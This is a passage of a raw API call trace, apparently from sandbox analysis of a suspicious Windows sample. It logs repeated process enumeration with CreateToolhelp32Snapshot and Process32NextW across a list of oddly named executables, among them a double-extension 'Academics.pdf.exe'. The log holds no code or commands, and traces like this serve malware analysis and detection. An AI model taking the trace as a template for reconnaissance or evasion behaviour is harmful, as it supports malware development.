(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0286.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0286.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0286.977] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0286.979] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0286.980] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.981] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0286.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0286.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0286.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0286.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0286.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0286.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0286.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0286.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0286.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0286.998] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.999] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0287.000] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0287.001] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0287.002] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0287.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0287.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0287.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0287.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0287.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0287.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0287.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0287.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0287.011] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0287.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0287.013] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0287.014] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0287.015] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0287.016] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0287.016] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0287.017] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0287.020] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.020] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0287.021] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.022] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0287.023] CloseHandle (hObject=0x294) returned 1 [0287.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0287.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0287.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0287.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0287.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0287.023] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0287.023] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0287.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0287.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0287.023] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0287.026] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.026] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0287.027] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0287.028] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0287.030] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.030] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0287.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0287.032] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0287.033] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0287.034] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.034] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.035] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.036] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.037] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0287.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.041] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0287.041] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0287.042] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0287.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0287.044] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.045] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0287.046] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0287.046] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0287.047] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0287.048] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0287.049] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0287.050] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, 